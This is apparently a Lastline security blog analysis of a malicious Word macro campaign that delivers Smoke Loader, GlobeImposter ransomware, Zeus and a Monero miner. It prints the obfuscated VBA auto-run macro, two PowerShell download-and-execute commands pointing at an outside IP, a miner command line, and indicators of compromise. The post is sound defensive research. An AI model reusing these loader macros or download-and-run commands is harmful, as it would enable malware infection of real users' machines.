Authored by Alexander Sevtsov
Edited by Stefano Ortolani
Introduction
Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.
The Malicious Document
The malicious document file consists of the following macro code:
Private Sub Document_Open()
Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) +
Chr(108) + Chr(101)), vbFromUnicode)
For izhkaheje = 0 To UBound(abasekjsh)
abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
Next izhkaheje
bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)),
"FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End SubThe macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.
The PowerShell Downloader
Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:
powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process - Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');
This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.
Payload – Smoke Loader
The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):
As it often happens, signatures are not really informative as we can see in Figure 2.
The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:
- GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
- Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
- Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:
wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ 4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe
Intelligence
It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:
powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env: temp + '\~tmp.exe';
foreach($myurl in $myurls) {
try {
$webclient.DownloadFile($myurl.ToString(), $path);
Start-Process $path;
break;
} catch {}
}This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.
Mitigation
There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.
Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.
Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)
Conclusion
In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.
Appendix: IoCs
| Files | |
| The Malicious Document | b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16 |
| Smoke Loader | f227820689bdc628de34cc9c21000f3d458a26bf |
| Monero CPU Miner | 88eba5d205d85c39ced484a3aa7241302fd815e3 |
| Zeus Trojan | 54949587044a4e3732087a56bc1d36096b9f0075 |
| GlobeImposter Ransomware | f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26 |
| Network | |
| 80.82.67[.]217 | |
| 107.181.254[.]15 | |
| Smoke Loader C&C | microsoftoutlook[.]bit |
The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.
Article Link: https://www.lastline.com/labsblog/smoke-loader-campaign/